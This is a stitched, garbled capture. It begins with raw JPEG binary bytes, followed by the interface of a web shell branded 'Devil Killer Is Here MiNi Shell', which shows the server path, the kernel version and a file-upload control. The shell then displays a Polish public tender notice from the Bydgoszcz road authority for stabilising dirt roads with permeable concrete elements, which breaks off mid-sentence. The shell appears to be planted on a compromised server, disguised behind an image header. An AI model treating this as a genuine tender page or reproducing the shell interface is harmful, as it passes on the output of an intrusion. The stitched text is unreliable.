JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250724/0034381301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Stabilizacja nawierzchni dróg gruntowych w Bydgoszczy betonowymi elementami przepuszczalnymi w 2025r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Miejskich i Komunikacji Publicznej w Bydgoszczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 090476971</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Toruńska 174a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-844</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52-582-27-23</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">52-582-27-77</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zarzad@zdmikp.bydgoszcz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdmikp.bydgoszcz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Budowa i utrzymanie sieci drogowej i obiektów inzynierskich, lokalny transport zbiorowy </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Stabilizacja nawierzchni dróg gruntowych w Bydgoszczy betonowymi elementami przepuszczalnymi w 2025r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e8368194-ee3c-4d85-8be1-642cc6bc875f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00343813</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00038536/15/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.20 Stabilizacja nawierzchni dróg gruntowych w Bydgoszczy betonowymi elementami przepuszczalnymi w 2025r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1148263 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1148263</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa<br/>niezbędnewymagania sprzętowo-aplikacyjne umożliwiające pracę na platformie zakup[owej www.platformazakupowa.pl tj:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, lub inny dowolny system operacyjny<br/>w wersji umożliwiającej zainstalowanie dowolnej przeglądarki internetowej,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript, akceptująca pliki typu „cookies”,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) szyfrowanie na Platformie odbywa się za pomocą protokołu TLS 1.3,<br/>g) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego z zegarem Głównego Urzędu Miar</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, iż po wejściu w życie, tj. po dniu 25 maja 2018 r., przepisów dotyczących ochrony danych osobowych, będzie przetwarzał dane osobowe uzyskane w trakcie postępowania, a w<br/>szczególności: dane osobowe ujawnione w ofertach, dokumentach i oświadczeniach dołączonych do oferty oraz dane osobowe<br/>ujawnione w dokumentach i oświadczeniach składanych na potwierdzenie braku podstaw wykluczenia i spełnienie warunków udziału w postępowaniu. Przetwarzanie danych osobowych przez Zamawiającego jest niezbędne dla celów wynikających z prawnie<br/>uzasadnionych interesów realizowanych przez Zamawiającego i wypełnienia obowiązku prawnego ciążącego na administratorze<br/>(Informacja o przetwarzaniu danych osobowych – Załącznik nr 13 do SWZ).<br/>Wykonawca przystępując do postępowania jest obowiązany do pisemnego poinformowania i uzyskania zgody każdej osoby, której<br/>dane osobowe będą podane w ofercie, oświadczeniach<br/>i dokumentach złożonych w postępowaniu. Na tę okoliczność Wykonawca złoży stosowne pisemne oświadczenie (jak we wzorze<br/>formularza ofertowego – Załącznik nr 2 (I-II) SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">NZ.2531.37.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest robota budowlana, w rozumieniu art. 7 pkt 21 Pzp oraz <br/>w rozumieniu art. 3 pkt. 6 i 7a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, polegająca na Stabilizacji nawierzchni dróg gruntowych w Bydgoszczy betonowymi elementami przepuszczalnymi w 2025r.<br/>2.	Opis części zamówienia, jeżeli Zamawiający dopuszcza składanie ofert częściowych: <br/>1)	Zamawiający dopuszcza składanie ofert częściowych, o których mowa w art. 7 pkt 15 Pzp.<br/>2)	Zamówienie może zostać udzielone temu samemu wykonawcy na wszystkie części.<br/>3)	Wykonawca może złożyć ofertę na wszystkie części zamówienia, przy czym na każdą część zamówienia wykonawca może złożyć tylko jedną ofertę.<br/>Stabilizacja nawierzchni dróg gruntowych w Bydgoszczy betonowymi elementami przepuszczalnymi w 2025r. – Część I<br/>Przedmiotem zamówienia w Części I jest przebudowa ul. Gniewkowskiej (droga gminna nr 200239C) zlokalizowana jest na działkach nr 210, 217 obr. 0158 oraz nr 61/85, 68/4, 79/2 obr. 0159 (bonitacja dr – tereny komunikacyjne drogi). <br/>Teren inwestycji objęty jest Miejscowym Planem Zagospodarowania Przestrzennego (Uchwała Nr VII/189/99 Rady Miasta Bydgoszczy z dnia 15 marca 1999 r. w sprawie miejscowego planu zagospodarowania przestrzennego obszaru Glinki „B” w Bydgoszczy) <br/>i oznaczony został symbolami B42-KL teren drogi publicznej – ulica lokalna oraz B43-KL teren drogi publicznej – ulica lokalna.<br/>Teren nie jest objęty ochroną konserwatorską.<br/>W ramach realizowanych robót wykonana zostanie przebudowana ulicy Gniewkowska o łącznej długości 572 m. Prace nie zmieniają istniejącej niwelety drogi, nie kolidują z istniejącą infrastrukturą podziemną i nie wymagają regulacji urządzeń innych gestorów. <br/>W ramach zadania wykonane zostaną z geokraty miejsca parkingowe prostopadłe oraz równoległe. Na wniosek mieszkańców trzy miejsca prostopadłe zostaną wykonane o długości 6-metrów tak by umożliwić parkowanie dłuższych pojazdów.<br/>Szczegółowy opis przedmiotu zamówienia, zakres i warunki wykonania zamówienia opisane zostały w projektowanych postanowieniach Umowy z załącznikami, stanowiące załącznik Nr 1 do SWZ (wspólne dla wszystkich części), w tym:<br/>1)	opis przedmiotu zamówienia z załącznikami – załącznik Nr 2-I <br/>do projektowanych postanowień Umowy (oddzielny dla każdej części), <br/>oraz we wzorze formularza ofertowego, stanowiącym załącznik nr 2-I do SWZ i we wzorze kosztorysu ofertowego - załącznik Nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233252-0 - Roboty w zakresie nawierzchni ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">75 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 <br/>ust. 1 pkt 7 Pzp, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, polegających na powtórzeniu podobnych robót budowlanych, jeśli zaistnieje uzasadniona potrzeba rozszerzenia zamówienia podstawowego i będzie posiadał środki finansowe <br/>na ich wykonanie w maksymalnym zakresie określonym w załączniku Nr 10-Ido projektowanych postanowień Umowy (oddzielny dla każdej części). Na okoliczność wystąpienia ww. zamówień, zostanie zawarta odrębna umowa.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona w oparciu o kryteria szczegółowo opisane w punkcie XXI SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja jakości na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest robota budowlana, w rozumieniu art. 7 pkt 21 Pzp oraz <br/>w rozumieniu art. 3 pkt. 6 i 7a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, polegająca na Stabilizacji nawierzchni dróg gruntowych w Bydgoszczy betonowymi elementami przepuszczalnymi w 2025r.<br/>2.	Opis części zamówienia, jeżeli Zamawiający dopuszcza składanie ofert częściowych: <br/>1)	Zamawiający dopuszcza składanie ofert częściowych, o których mowa w art. 7 pkt 15 Pzp.<br/>2)	Zamówienie może zostać udzielone temu samemu wykonawcy na wszystkie części.<br/>3)	Wykonawca może złożyć ofertę na wszystkie części zamówienia, przy czym na każdą część zamówienia wykonawca może złożyć tylko jedną ofertę.<br/>Stabilizacja nawierzchni dróg gruntowych w Bydgoszczy betonowymi elementami przepuszczalnymi w 2025r.– Część II<br/>Przedmiotem zamówienia w Części II jest:<br/>- przebudowa ul. Amurowej (droga gminna nr 200016C) zlokalizowana jest na działkach nr 249/3, 361 ob. 313 (bonitacja dr – tereny komunikacyjne drogi).<br/>Teren inwestycji jest objęty miejscowo Miejscowym Planem Zagospodarowania Przestrzennego, *Uchwała Nr XI/342/99 Rady Miasta Bydgoszczy z dnia 30.06.1999 r. w sprawie miejscowego planu zagospodarowania przestrzennego Osowej Góry obejmującego tereny zlokalizowane na północ od ulicy Grunwaldzkiej.<br/>Teren objęty zadaniem oznaczony jest w MPZP symbolem KD – ulice dojazdowe. Teren nie jest objęty ochroną konserwatorską. <br/>Projekt jest zgodny z ustaleniami w/w MPZP. <br/>W ramach realizowanych robót wykonana zostanie przebudowana ulicy Amurowej o łącznej długości 122,02 m. Prace nie zmieniają istniejącej niwelety drogi, nie kolidują z istniejąca infrastrukturą podziemną i nie wymagają regulacji urządzeń innych gestorów. <br/> - przebudowa ul. Białobłockiej (droga gminna nr 200045C) zlokalizowana jest na działkach nr 120/23, 106/56, 121/20, 106/61 obr. 0045 (bonitacja dr – tereny komunikacyjne drogi).<br/>Teren inwestycji objęty jest Miejscowym Planem Zagospodarowania Przestrzennego (111 Miedzyń - Wiśniowa) i oznaczony został symbolem 065.KD-DX teren drogi publicznej – ulica dojazdowa – ciąg pieszo-jezdny<br/>Teren nie jest objęty ochroną konserwatorską.<br/>W ramach realizowanych robót wykonana zostanie przebudowana ulicy Białobłockiej o łącznej długości 100 m wraz z przebudową skrzyżowania z ulicą Krzywą. Prace nie zmieniają istniejącej niwelety drogi, nie kolidują z istniejąca infrastrukturą podziemną i nie wymagają regulacji urządzeń innych gestorów. <br/> - przebudowa ul. Oceanicznej (droga gminna nr 200613C) zlokalizowana jest na działkach nr 137, 138 obr. 312 (bonitacja dr – tereny komunikacyjne drogi). <br/>Teren inwestycji znajduje się w granicach ustaleń miejscowego planu zagospodarowania przestrzennego osiedla Osowej Góry obejmującego tereny zlokalizowane na północ od ulicy Grunwaldzkiej w Bydgoszczy i oznaczony został symbolem KD (teren komunikacji publicznej– ulica dojazdowa)<br/>Teren nie jest objęty ochroną konserwatorską. <br/>W ramach realizowanych robót wykonana zostanie przebudowana ulicy Oceanicznej o łącznej długości 90 m. Prace nie zmieniają istniejącej niwelety drogi, nie kolidują z istniejąca infrastrukturą podziemną i nie wymagają regulacji urządzeń innych gestorów. <br/>Szczegółowy opis przedmiotu zamówienia, zakres i warunki wykonania zamówienia opisane zostały w projektowanych postanowieniach Umowy z załącznikami, stanowiące załącznik Nr 1 do SWZ (wspólne dla wszystkich części), w tym:<br/>1)	opis przedmiotu zamówienia z załącznikami – załącznik Nr 2-II<br/>do projektowanych postanowień Umowy (oddzielny dla każdej ulicy), <br/>oraz we wzorze formularza ofertowego, stanowiącym załącznik nr 2 - II do SWZ (oddzielny dla każdej części) i we wzorze kosztorysu ofertowego - załącznik Nr 4 do SWZ (oddzielny dla każdej ulicy). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233252-0 - Roboty w zakresie nawierzchni ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 <br/>ust. 1 pkt 7 Pzp, w okresie 3 lat od dnia udzielenia zamówienia podstawowego, polegających na powtórzeniu podobnych robót budowlanych, jeśli zaistnieje uzasadniona potrzeba rozszerzenia zamówienia podstawowego i będzie posiadał środki finansowe <br/>na ich wykonanie w maksymalnym zakresie określonym w załączniku Nr 10-II do projektowanych postanowień Umowy (oddzielny dla każdej części). Na okoliczność wystąpienia ww. zamówień, zostanie zawarta odrębna umowa.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena ofert zostanie przeprowadzona w oparciu o kryteria szczegółowo opisane w punkcie XXI SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja jakości na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące zdolności technicznej lub zawodowej w zakresie:<br/>1)	doświadczenia wykonawcy <br/>a)	Minimalny poziom zdolności - Część I. <br/>Wykonawca zobowiązany jest wykazać się doświadczeniem w wykonaniu, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jednej roboty budowlanej, polegającej na wykonaniu nawierzchni z elementów prefabrykowanych o powierzchni minimum 1 500 m2. <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie <br/>art. 58 Pzp ww. warunek udziału w postępowaniu spełniają w następujący sposób: przynajmniej jeden z tych wykonawców musi posiadać doświadczenie w ww. zakresie, <br/>z tym że wymóg posiadania doświadczenia dotyczy wykonawców zamierzających bezpośrednio realizować zamówienie.<br/>b)	Minimalny poziom zdolności - Część II. <br/>Wykonawca zobowiązany jest wykazać się doświadczeniem w wykonaniu, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jednej roboty budowlanej, polegającej na wykonaniu nawierzchni z elementów prefabrykowanych o powierzchni minimum 500 m2. <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia na podstawie <br/>art. 58 Pzp ww. warunek udziału w postępowaniu spełniają w następujący sposób: przynajmniej jeden z tych wykonawców 